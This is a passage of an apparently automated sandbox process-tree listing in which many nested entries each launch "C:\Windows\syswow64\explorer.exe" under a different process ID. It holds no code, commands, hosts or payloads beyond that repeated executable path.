                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7528
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:8032
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7504
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:2952
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:6584
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:5616
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:216
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:5024
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:6476
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:5604
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:2268
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7640
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:6376
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:2916
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:2624
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:1740
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:6168
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:3820
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:4740
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:5412
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:3732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
    PID:4072
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7728
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7712
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7756
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:1848
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7732
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:1932
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:296
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:2828
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7244
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7860
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7876
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:7884
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  4⤵
    PID:5672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
